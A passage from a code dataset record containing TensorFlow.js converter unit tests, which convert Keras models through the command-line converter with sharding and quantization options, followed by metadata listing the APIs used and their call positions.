self.assertTrue(os.path.isfile(new_h5_path))\n\n # 4. Load the model back and assert on the equality of the predict\n # results.\n model_prime = keras.models.load_model(new_h5_path)\n new_y = model_prime.predict([x1, x2])\n self.assertAllClose(y, new_y)\n\n def testUsingIncorrectKerasSavedModelRaisesError(self):\n with tf.Graph().as_default(), tf.compat.v1.Session():\n x = np.random.randn(8, 10)\n\n # 1. Run the model.predict(), store the result. Then saved the model\n # as a SavedModel.\n model = self._createNestedSequentialModel()\n y = model.predict(x)\n\n keras.experimental.export_saved_model(model, self._tmp_dir)\n\n # 2. Convert the keras saved model to tfjs format.\n tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')\n # Use incorrect --input_format value: keras\n process = subprocess.Popen(\n [\n 'tensorflowjs_converter', '--input_format', 'keras',\n self._tmp_dir, tfjs_output_dir\n ],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n _, stderr = process.communicate()\n self.assertIn(\n b'Expected path to point to an HDF5 file, '\n b'but it points to a directory', tf.compat.as_bytes(stderr))\n\n def testConvertTfjsLayersModelIntoShardedWeights(self):\n with tf.Graph().as_default(), tf.compat.v1.Session():\n x = np.random.randn(8, 10)\n\n # 1. Run the model.predict(), store the result. Then saved the model\n # as a SavedModel.\n model = self._createNestedSequentialModel()\n y = model.predict(x)\n\n weights = model.get_weights()\n total_weight_bytes = sum(np.size(w) for w in weights) * 4\n\n keras.experimental.export_saved_model(model, self._tmp_dir)\n\n # 2. Convert the keras saved model to tfjs_layers_model format.\n tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')\n # Implicit value of --output_format: tfjs_layers_model\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'keras_saved_model',\n self._tmp_dir, tfjs_output_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # 3. 
Convert the tfjs_layers_model to another tfjs_layers_model,\n # with sharded weights.\n weight_shard_size_bytes = int(total_weight_bytes * 0.3)\n # Due to the shard size, there ought to be 4 shards after conversion.\n sharded_model_dir = os.path.join(self._tmp_dir, 'tfjs_sharded')\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'tfjs_layers_model',\n '--weight_shard_size_bytes', str(weight_shard_size_bytes),\n os.path.join(tfjs_output_dir, 'model.json'), sharded_model_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # 4. Check the sharded weight files and their sizes.\n weight_files = sorted(\n glob.glob(os.path.join(sharded_model_dir, 'group*.bin')))\n self.assertEqual(len(weight_files), 4)\n weight_file_sizes = [os.path.getsize(f) for f in weight_files]\n self.assertEqual(sum(weight_file_sizes), total_weight_bytes)\n self.assertEqual(weight_file_sizes[0], weight_file_sizes[1])\n self.assertEqual(weight_file_sizes[0], weight_file_sizes[2])\n self.assertLess(weight_file_sizes[3], weight_file_sizes[0])\n\n # 5. Convert the sharded tfjs_layers_model back into a keras h5 file.\n new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n os.path.join(sharded_model_dir, 'model.json'), new_h5_path\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n with tf.Graph().as_default(), tf.compat.v1.Session():\n # 6. Load the keras model and check the predict() output is close to\n # before.\n new_model = keras.models.load_model(new_h5_path)\n new_y = new_model.predict(x)\n self.assertAllClose(new_y, y)\n\n def testConvertTfjsLayersModelWithQuantization(self):\n with tf.Graph().as_default(), tf.compat.v1.Session():\n x = np.random.randn(8, 10)\n\n # 1. Run the model.predict(), store the result. Then saved the model\n # as a SavedModel.\n model = self._createNestedSequentialModel()\n y = model.predict(x)\n\n weights = model.get_weights()\n total_weight_bytes = sum(np.size(w) for w in weights) * 4\n\n keras.experimental.export_saved_model(model, self._tmp_dir)\n\n # 2. Convert the keras saved model to tfjs_layers_model format.\n tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')\n # Implicit value of --output_format: tfjs_layers_model\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'keras_saved_model',\n self._tmp_dir, tfjs_output_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # 3. Convert the tfjs_layers_model to another tfjs_layers_model,\n # with uint16 quantization.\n weight_shard_size_bytes = int(total_weight_bytes * 0.3)\n # Due to the shard size, there ought to be 4 shards after conversion.\n sharded_model_dir = os.path.join(self._tmp_dir, 'tfjs_sharded')\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'tfjs_layers_model',\n '--quantization_bytes', '2',\n os.path.join(tfjs_output_dir, 'model.json'), sharded_model_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # 4. 
Check the quantized weight file and its size.\n weight_files = sorted(\n glob.glob(os.path.join(sharded_model_dir, 'group*.bin')))\n self.assertEqual(len(weight_files), 1)\n weight_file_size = os.path.getsize(weight_files[0])\n # The size of the weight file should reflect the uint16 quantization.\n self.assertEqual(weight_file_size, total_weight_bytes // 2)\n\n\n def testConvertTfjsLayersModelToTfjsGraphModel(self):\n x = np.random.randn(8, 10)\n\n # 1. Create a model for testing.\n model = keras.Sequential()\n model.add(keras.layers.Dense(10, activation='relu', input_shape=[4]))\n model.add(keras.layers.Dense(1, activation='sigmoid'))\n\n h5_path = os.path.join(self._tmp_dir, 'model.h5')\n model.save(h5_path)\n\n # 2. Convert the keras saved model to tfjs_layers_model format.\n layers_model_output_dir = os.path.join(self._tmp_dir, 'tfjs_layers')\n # Implicit value of --output_format: tfjs_layers_model\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'keras',\n h5_path, layers_model_output_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # 3. Convert the tfjs_layers_model to another tfjs_graph_model.\n graph_model_dir = os.path.join(self._tmp_dir, 'tfjs_graph')\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'tfjs_graph_model',\n os.path.join(layers_model_output_dir, 'model.json'), graph_model_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # 4. Check the model.json and weight file and its size.\n self.assertTrue(os.path.isfile(os.path.join(graph_model_dir, 'model.json')))\n weight_files = sorted(\n glob.glob(os.path.join(graph_model_dir, 'group*.bin')))\n self.assertEqual(len(weight_files), 1)\n\n\nif __name__ == '__main__':\n tf.test.main()\n"},"apis":{"kind":"list like","value":["tensorflow.python.eager.def_function.function","tensorflow.keras.layers.Dense","tensorflow.keras.models.load_model","tensorflow.keras.experimental.export_saved_model","tensorflow.compat.as_bytes","tensorflow.python.ops.variables.Variable","tensorflow.compat.v1.Session","tensorflow.compat.v1.global_variables_initializer","tensorflow.compat.v1.placeholder","tensorflow.keras.layers.Input","tensorflow.Graph","tensorflow.compat.v1.saved_model.builder.SavedModelBuilder","tensorflow.keras.layers.Reshape","tensorflow.keras.Sequential","tensorflow_hub.create_module_spec","tensorflow.python.training.tracking.tracking.AutoTrackable","tensorflow.python.saved_model.save.save","subprocess.Popen","tensorflow.compat.v1.saved_model.signature_def_utils.predict_signature_def","os.path.isdir","tensorflow.keras.models.Model","tensorflow.compat.v1.nn.softmax","os.path.getsize","tensorflow_hub.Module","tensorflow.Variable","numpy.size","tensorflowjs.converters.save_keras_model","os.path.isfile","tensorflow.keras.layers.LSTM","os.path.dirname","tempfile.mkdtemp","tensorflow.compat.v1.constant","tensorflow.keras.Input","numpy.random.randn","tensorflow.compat.v1.name_scope","tensorflow.compat.v1.matmul","tensorflow.compat.v1.get_variable","tensorflow.keras.layers.Concatenate","os.path.join","tensorflow.python.framework.constant_op.constant","tensorflowjs.__version__.count","tensorflow.test.main","json.load","shutil.rmtree","tensorflow.keras.Model","tensorflow_hub.add_signature"],"string":"[\n \"tensorflow.python.eager.def_function.function\",\n \"tensorflow.keras.layers.Dense\",\n \"tensorflow.keras.models.load_model\",\n \"tensorflow.keras.experimental.export_saved_model\",\n 
\"tensorflow.compat.as_bytes\",\n \"tensorflow.python.ops.variables.Variable\",\n \"tensorflow.compat.v1.Session\",\n \"tensorflow.compat.v1.global_variables_initializer\",\n \"tensorflow.compat.v1.placeholder\",\n \"tensorflow.keras.layers.Input\",\n \"tensorflow.Graph\",\n \"tensorflow.compat.v1.saved_model.builder.SavedModelBuilder\",\n \"tensorflow.keras.layers.Reshape\",\n \"tensorflow.keras.Sequential\",\n \"tensorflow_hub.create_module_spec\",\n \"tensorflow.python.training.tracking.tracking.AutoTrackable\",\n \"tensorflow.python.saved_model.save.save\",\n \"subprocess.Popen\",\n \"tensorflow.compat.v1.saved_model.signature_def_utils.predict_signature_def\",\n \"os.path.isdir\",\n \"tensorflow.keras.models.Model\",\n \"tensorflow.compat.v1.nn.softmax\",\n \"os.path.getsize\",\n \"tensorflow_hub.Module\",\n \"tensorflow.Variable\",\n \"numpy.size\",\n \"tensorflowjs.converters.save_keras_model\",\n \"os.path.isfile\",\n \"tensorflow.keras.layers.LSTM\",\n \"os.path.dirname\",\n \"tempfile.mkdtemp\",\n \"tensorflow.compat.v1.constant\",\n \"tensorflow.keras.Input\",\n \"numpy.random.randn\",\n \"tensorflow.compat.v1.name_scope\",\n \"tensorflow.compat.v1.matmul\",\n \"tensorflow.compat.v1.get_variable\",\n \"tensorflow.keras.layers.Concatenate\",\n \"os.path.join\",\n \"tensorflow.python.framework.constant_op.constant\",\n \"tensorflowjs.__version__.count\",\n \"tensorflow.test.main\",\n \"json.load\",\n \"shutil.rmtree\",\n \"tensorflow.keras.Model\",\n \"tensorflow_hub.add_signature\"\n]"},"extract_api":{"kind":"string","value":"[((1826, 1850), 'tensorflow.keras.layers.Input', 'keras.layers.Input', (['(3,)'], {}), '((3,))\\n', (1844, 1850), False, 'from tensorflow import keras\\n'), ((2177, 2236), 'tensorflow.keras.models.Model', 'keras.models.Model', ([], {'inputs': '[input_tensor]', 'outputs': '[output]'}), '(inputs=[input_tensor], outputs=[output])\\n', (2195, 2236), False, 'from tensorflow import keras\\n'), ((2622, 2632), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\\n', (2630, 2632), True, 'import tensorflow as tf\\n'), ((3916, 3952), 'tensorflow.python.framework.constant_op.constant', 'constant_op.constant', (['(1.0)'], {'shape': '[1]'}), '(1.0, shape=[1])\\n', (3936, 3952), False, 'from tensorflow.python.framework import constant_op\\n'), ((3961, 3985), 'tensorflow.python.training.tracking.tracking.AutoTrackable', 'tracking.AutoTrackable', ([], {}), '()\\n', (3983, 3985), False, 'from tensorflow.python.training.tracking import tracking\\n'), ((3998, 4021), 'tensorflow.python.ops.variables.Variable', 'variables.Variable', (['(3.0)'], {}), '(3.0)\\n', (4016, 4021), False, 'from tensorflow.python.ops import variables\\n'), ((4033, 4056), 'tensorflow.python.ops.variables.Variable', 'variables.Variable', (['(2.0)'], {}), '(2.0)\\n', (4051, 4056), False, 'from tensorflow.python.ops import variables\\n'), ((4067, 4121), 'tensorflow.python.eager.def_function.function', 'def_function.function', (['(lambda x: root.v1 * root.v2 * x)'], {}), '(lambda x: root.v1 * root.v2 * x)\\n', (4088, 4121), False, 'from tensorflow.python.eager import def_function\\n'), ((4178, 4208), 'tensorflow.python.saved_model.save.save', 'save', (['root', 'save_path', 'to_save'], {}), '(root, save_path, to_save)\\n', (4182, 4208), False, 'from tensorflow.python.saved_model.save import save\\n'), ((4580, 4590), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\\n', (4588, 4590), True, 'import tensorflow as tf\\n'), ((33845, 33859), 'tensorflow.test.main', 'tf.test.main', ([], {}), '()\\n', (33857, 33859), True, 
'import tensorflow as tf\\n'), ((1863, 1986), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(4)'], {'use_bias': '(True)', 'kernel_initializer': '\"\"\"ones\"\"\"', 'bias_initializer': '\"\"\"zeros\"\"\"', 'name': \"(layer_name_prefix + '1')\"}), \"(4, use_bias=True, kernel_initializer='ones',\\n bias_initializer='zeros', name=layer_name_prefix + '1')\\n\", (1881, 1986), False, 'from tensorflow import keras\\n'), ((2039, 2138), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(2)'], {'use_bias': '(False)', 'kernel_initializer': '\"\"\"ones\"\"\"', 'name': \"(layer_name_prefix + '2')\"}), \"(2, use_bias=False, kernel_initializer='ones', name=\\n layer_name_prefix + '2')\\n\", (2057, 2138), False, 'from tensorflow import keras\\n'), ((4450, 4473), 'tensorflow.Variable', 'tf.Variable', (['[2.0, 4.0]'], {}), '([2.0, 4.0])\\n', (4461, 4473), True, 'import tensorflow as tf\\n'), ((4482, 4524), 'tensorflow.compat.v1.placeholder', 'tf.compat.v1.placeholder', ([], {'dtype': 'tf.float32'}), '(dtype=tf.float32)\\n', (4506, 4524), True, 'import tensorflow as tf\\n'), ((4529, 4571), 'tensorflow_hub.add_signature', 'hub.add_signature', ([], {'inputs': 'x', 'outputs': '(x * w)'}), '(inputs=x, outputs=x * w)\\n', (4546, 4571), True, 'import tensorflow_hub as hub\\n'), ((4629, 4669), 'tensorflow_hub.create_module_spec', 'hub.create_module_spec', (['double_module_fn'], {}), '(double_module_fn)\\n', (4651, 4669), True, 'import tensorflow_hub as hub\\n'), ((4678, 4694), 'tensorflow_hub.Module', 'hub.Module', (['spec'], {}), '(spec)\\n', (4688, 4694), True, 'import tensorflow_hub as hub\\n'), ((4725, 4758), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {'graph': 'graph'}), '(graph=graph)\\n', (4745, 4758), True, 'import tensorflow as tf\\n'), ((5014, 5032), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\\n', (5030, 5032), False, 'import tempfile\\n'), ((5062, 5111), 'os.path.join', 'os.path.join', (['cls.class_tmp_dir', '\"\"\"tf_saved_model\"\"\"'], {}), \"(cls.class_tmp_dir, 'tf_saved_model')\\n\", (5074, 5111), False, 'import os\\n'), ((5144, 5196), 'os.path.join', 'os.path.join', (['cls.class_tmp_dir', '\"\"\"tf_saved_model_v1\"\"\"'], {}), \"(cls.class_tmp_dir, 'tf_saved_model_v1')\\n\", (5156, 5196), False, 'import os\\n'), ((5369, 5417), 'os.path.join', 'os.path.join', (['cls.class_tmp_dir', '\"\"\"tf_hub_module\"\"\"'], {}), \"(cls.class_tmp_dir, 'tf_hub_module')\\n\", (5381, 5417), False, 'import os\\n'), ((5510, 5542), 'shutil.rmtree', 'shutil.rmtree', (['cls.class_tmp_dir'], {}), '(cls.class_tmp_dir)\\n', (5523, 5542), False, 'import shutil\\n'), ((5923, 5941), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\\n', (5939, 5941), False, 'import tempfile\\n'), ((6013, 6041), 'os.path.isdir', 'os.path.isdir', (['self._tmp_dir'], {}), '(self._tmp_dir)\\n', (6026, 6041), False, 'import os\\n'), ((9021, 9192), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'nonsensical_format', self.\\n _tmp_dir, self._tmp_dir]\"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), \"(['tensorflowjs_converter', '--input_format',\\n 'nonsensical_format', self._tmp_dir, self._tmp_dir], stdout=subprocess.\\n PIPE, stderr=subprocess.PIPE)\\n\", (9037, 9192), False, 'import subprocess\\n'), ((9452, 9549), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter']\"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), \"(['tensorflowjs_converter'], stdout=subprocess.PIPE, stderr\\n =subprocess.PIPE)\\n\", 
(9468, 9549), False, 'import subprocess\\n'), ((15253, 15280), 'os.path.join', 'os.path.join', (['self._tmp_dir'], {}), '(self._tmp_dir)\\n', (15265, 15280), False, 'import os\\n'), ((15295, 15463), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'tf_saved_model',\\n '--output_format', 'tfjs_graph_model', self.tf_saved_model_v1_dir,\\n output_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format',\\n 'tf_saved_model', '--output_format', 'tfjs_graph_model', self.\\n tf_saved_model_v1_dir, output_dir])\\n\", (15311, 15463), False, 'import subprocess\\n'), ((16083, 16110), 'os.path.join', 'os.path.join', (['self._tmp_dir'], {}), '(self._tmp_dir)\\n', (16095, 16110), False, 'import os\\n'), ((16125, 16237), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'tf_hub', self.\\n tf_hub_module_dir, output_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format', 'tf_hub',\\n self.tf_hub_module_dir, output_dir])\\n\", (16141, 16237), False, 'import subprocess\\n'), ((16915, 16942), 'os.path.join', 'os.path.join', (['self._tmp_dir'], {}), '(self._tmp_dir)\\n', (16927, 16942), False, 'import os\\n'), ((16957, 17122), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'tf_saved_model',\\n '--output_format', 'tfjs_graph_model', self.tf_saved_model_dir, output_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format',\\n 'tf_saved_model', '--output_format', 'tfjs_graph_model', self.\\n tf_saved_model_dir, output_dir])\\n\", (16973, 17122), False, 'import subprocess\\n'), ((18336, 18363), 'os.path.join', 'os.path.join', (['self._tmp_dir'], {}), '(self._tmp_dir)\\n', (18348, 18363), False, 'import os\\n'), ((18378, 18490), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'tf_hub', self.\\n tf_hub_module_dir, output_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format', 'tf_hub',\\n self.tf_hub_module_dir, output_dir])\\n\", (18394, 18490), False, 'import subprocess\\n'), ((19283, 19334), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"keras_h5\"\"\"', '\"\"\"model.h5\"\"\"'], {}), \"(self._tmp_dir, 'keras_h5', 'model.h5')\\n\", (19295, 19334), False, 'import os\\n'), ((19560, 19659), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format', 'keras',\\n h5_path, self._tmp_dir])\\n\", (19576, 19659), False, 'import subprocess\\n'), ((19825, 19866), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"model_2.h5\"\"\"'], {}), \"(self._tmp_dir, 'model_2.h5')\\n\", (19837, 19866), False, 'import os\\n'), ((20632, 20683), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"keras_h5\"\"\"', '\"\"\"model.h5\"\"\"'], {}), \"(self._tmp_dir, 'keras_h5', 'model.h5')\\n\", (20644, 20683), False, 'import os\\n'), ((20909, 21008), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format', 'keras',\\n h5_path, self._tmp_dir])\\n\", (20925, 21008), False, 'import subprocess\\n'), ((21455, 21565), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--version']\"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), \"(['tensorflowjs_converter', '--version'], stdout=subprocess\\n .PIPE, stderr=subprocess.PIPE)\\n\", (21471, 21565), False, 'import subprocess\\n'), 
((21804, 21906), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '-v']\"], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), \"(['tensorflowjs_converter', '-v'], stdout=subprocess.PIPE,\\n stderr=subprocess.PIPE)\\n\", (21820, 21906), False, 'import subprocess\\n'), ((22281, 22299), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\\n', (22297, 22299), False, 'import tempfile\\n'), ((22330, 22358), 'os.path.isdir', 'os.path.isdir', (['self._tmp_dir'], {}), '(self._tmp_dir)\\n', (22343, 22358), False, 'import os\\n'), ((22507, 22525), 'tensorflow.keras.Sequential', 'keras.Sequential', ([], {}), '()\\n', (22523, 22525), False, 'from tensorflow import keras\\n'), ((22755, 22773), 'tensorflow.keras.Sequential', 'keras.Sequential', ([], {}), '()\\n', (22771, 22773), False, 'from tensorflow import keras\\n'), ((22977, 22999), 'tensorflow.keras.Input', 'keras.Input', ([], {'shape': '[8]'}), '(shape=[8])\\n', (22988, 22999), False, 'from tensorflow import keras\\n'), ((23013, 23036), 'tensorflow.keras.Input', 'keras.Input', ([], {'shape': '[10]'}), '(shape=[10])\\n', (23024, 23036), False, 'from tensorflow import keras\\n'), ((23157, 23189), 'tensorflow.keras.Model', 'keras.Model', (['[input1, input2]', 'y'], {}), '([input1, input2], y)\\n', (23168, 23189), False, 'from tensorflow import keras\\n'), ((32381, 32403), 'numpy.random.randn', 'np.random.randn', (['(8)', '(10)'], {}), '(8, 10)\\n', (32396, 32403), True, 'import numpy as np\\n'), ((32454, 32472), 'tensorflow.keras.Sequential', 'keras.Sequential', ([], {}), '()\\n', (32470, 32472), False, 'from tensorflow import keras\\n'), ((32621, 32660), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"model.h5\"\"\"'], {}), \"(self._tmp_dir, 'model.h5')\\n\", (32633, 32660), False, 'import os\\n'), ((32784, 32826), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"tfjs_layers\"\"\"'], {}), \"(self._tmp_dir, 'tfjs_layers')\\n\", (32796, 32826), False, 'import os\\n'), ((32900, 33009), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'keras', h5_path,\\n layers_model_output_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format', 'keras',\\n h5_path, layers_model_output_dir])\\n\", (32916, 33009), False, 'import subprocess\\n'), ((33189, 33230), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"tfjs_graph\"\"\"'], {}), \"(self._tmp_dir, 'tfjs_graph')\\n\", (33201, 33230), False, 'import os\\n'), ((2669, 2704), 'tensorflow.compat.v1.name_scope', 'tf.compat.v1.name_scope', (['name_scope'], {}), '(name_scope)\\n', (2692, 2704), True, 'import tensorflow as tf\\n'), ((2716, 2766), 'tensorflow.compat.v1.constant', 'tf.compat.v1.constant', (['[[37.0, -23.0], [1.0, 4.0]]'], {}), '([[37.0, -23.0], [1.0, 4.0]])\\n', (2737, 2766), True, 'import tensorflow as tf\\n'), ((2777, 2821), 'tensorflow.compat.v1.get_variable', 'tf.compat.v1.get_variable', (['\"\"\"w\"\"\"'], {'shape': '[2, 2]'}), \"('w', shape=[2, 2])\\n\", (2802, 2821), True, 'import tensorflow as tf\\n'), ((2832, 2857), 'tensorflow.compat.v1.matmul', 'tf.compat.v1.matmul', (['x', 'w'], {}), '(x, w)\\n', (2851, 2857), True, 'import tensorflow as tf\\n'), ((2873, 2899), 'tensorflow.compat.v1.nn.softmax', 'tf.compat.v1.nn.softmax', (['y'], {}), '(y)\\n', (2896, 2899), True, 'import tensorflow as tf\\n'), ((2973, 3034), 'tensorflow.compat.v1.saved_model.builder.SavedModelBuilder', 'tf.compat.v1.saved_model.builder.SavedModelBuilder', (['save_path'], {}), '(save_path)\\n', (3023, 3034), True, 'import 
tensorflow as tf\\n'), ((4781, 4824), 'tensorflow.compat.v1.global_variables_initializer', 'tf.compat.v1.global_variables_initializer', ([], {}), '()\\n', (4822, 4824), True, 'import tensorflow as tf\\n'), ((6049, 6077), 'shutil.rmtree', 'shutil.rmtree', (['self._tmp_dir'], {}), '(self._tmp_dir)\\n', (6062, 6077), False, 'import shutil\\n'), ((6178, 6205), 'tensorflowjs.__version__.count', 'tfjs.__version__.count', (['\"\"\".\"\"\"'], {}), \"('.')\\n\", (6200, 6205), True, 'import tensorflowjs as tfjs\\n'), ((6364, 6418), 'tensorflowjs.converters.save_keras_model', 'tfjs.converters.save_keras_model', (['model', 'self._tmp_dir'], {}), '(model, self._tmp_dir)\\n', (6396, 6418), True, 'import tensorflowjs as tfjs\\n'), ((8039, 8061), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (8059, 8061), True, 'import tensorflow as tf\\n'), ((8157, 8212), 'tensorflowjs.converters.save_keras_model', 'tfjs.converters.save_keras_model', (['model1', 'self._tmp_dir'], {}), '(model1, self._tmp_dir)\\n', (8189, 8212), True, 'import tensorflowjs as tfjs\\n'), ((8298, 8320), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (8318, 8320), True, 'import tensorflow as tf\\n'), ((9364, 9390), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stderr'], {}), '(stderr)\\n', (9382, 9390), True, 'import tensorflow as tf\\n'), ((9709, 9735), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stderr'], {}), '(stderr)\\n', (9727, 9735), True, 'import tensorflow as tf\\n'), ((9819, 9841), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (9839, 9841), True, 'import tensorflow as tf\\n'), ((9958, 10009), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"keras_h5\"\"\"', '\"\"\"model.h5\"\"\"'], {}), \"(self._tmp_dir, 'keras_h5', 'model.h5')\\n\", (9970, 10009), False, 'import os\\n'), ((10081, 10180), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'keras', h5_path, self._tmp_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format', 'keras',\\n h5_path, self._tmp_dir])\\n\", (10097, 10180), False, 'import subprocess\\n'), ((12252, 12274), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (12272, 12274), True, 'import tensorflow as tf\\n'), ((12391, 12442), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"keras_h5\"\"\"', '\"\"\"model.h5\"\"\"'], {}), \"(self._tmp_dir, 'keras_h5', 'model.h5')\\n\", (12403, 12442), False, 'import os\\n'), ((12514, 12641), 'subprocess.Popen', 'subprocess.Popen', ([\"['tensorflowjs_converter', '--input_format', 'keras',\\n '--split_weights_by_layer', h5_path, self._tmp_dir]\"], {}), \"(['tensorflowjs_converter', '--input_format', 'keras',\\n '--split_weights_by_layer', h5_path, self._tmp_dir])\\n\", (12530, 12641), False, 'import subprocess\\n'), ((15148, 15174), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stderr'], {}), '(stderr)\\n', (15166, 15174), True, 'import tensorflow as tf\\n'), ((19228, 19267), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"keras_h5\"\"\"'], {}), \"(self._tmp_dir, 'keras_h5')\\n\", (19240, 19267), False, 'import os\\n'), ((19369, 19391), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (19389, 19391), True, 'import tensorflow as tf\\n'), ((20277, 20299), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (20297, 20299), True, 'import tensorflow as tf\\n'), ((20317, 20353), 'tensorflow.keras.models.load_model', 
'keras.models.load_model', (['new_h5_path'], {}), '(new_h5_path)\\n', (20340, 20353), False, 'from tensorflow import keras\\n'), ((20577, 20616), 'os.path.join', 'os.path.join', (['self._tmp_dir', '\"\"\"keras_h5\"\"\"'], {}), \"(self._tmp_dir, 'keras_h5')\\n\", (20589, 20616), False, 'import os\\n'), ((20718, 20740), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (20738, 20740), True, 'import tensorflow as tf\\n'), ((21200, 21222), 'tensorflow.compat.v1.Session', 'tf.compat.v1.Session', ([], {}), '()\\n', (21220, 21222), True, 'import tensorflow as tf\\n'), ((21695, 21751), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', ([\"('tensorflowjs %s' % tfjs.__version__)\"], {}), \"('tensorflowjs %s' % tfjs.__version__)\\n\", (21713, 21751), True, 'import tensorflow as tf\\n'), ((21761, 21787), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stdout'], {}), '(stdout)\\n', (21779, 21787), True, 'import tensorflow as tf\\n'), ((22037, 22093), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', ([\"('tensorflowjs %s' % tfjs.__version__)\"], {}), \"('tensorflowjs %s' % tfjs.__version__)\\n\", (22055, 22093), True, 'import tensorflow as tf\\n'), ((22103, 22129), 'tensorflow.compat.as_bytes', 'tf.compat.as_bytes', (['stdout'], {}), '(stdout)\\n', (22121, 22129), True, 'import tensorflow as tf\\n'), ((22366, 22394), 'shutil.rmtree', 'shutil.rmtree', (['self._tmp_dir'], {}), '(self._tmp_dir)\\n', (22379, 22394), False, 'import shutil\\n'), ((22540, 22585), 'tensorflow.keras.layers.Reshape', 'keras.layers.Reshape', (['[2, 3]'], {'input_shape': '[6]'}), '([2, 3], input_shape=[6])\\n', (22560, 22585), False, 'from tensorflow import keras\\n'), ((22601, 22622), 'tensorflow.keras.layers.LSTM', 'keras.layers.LSTM', (['(10)'], {}), '(10)\\n', (22618, 22622), False, 'from tensorflow import keras\\n'), ((22638, 22681), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(1)'], {'activation': '\"\"\"sigmoid\"\"\"'}), \"(1, activation='sigmoid')\\n\", (22656, 22681), False, 'from tensorflow import keras\\n'), ((22788, 22846), 'tensorflow.keras.layers.Dense', 'keras.layers.Dense', (['(6)'], {'input_shape': '[10]', 'activation': '\"\"\"relu\"\"\"'}), \"(6, input_shape=[10], activation='relu')\\n\", (22806, 22846), False, 'from tensorflow import keras\\n'), ((23045, 23071), 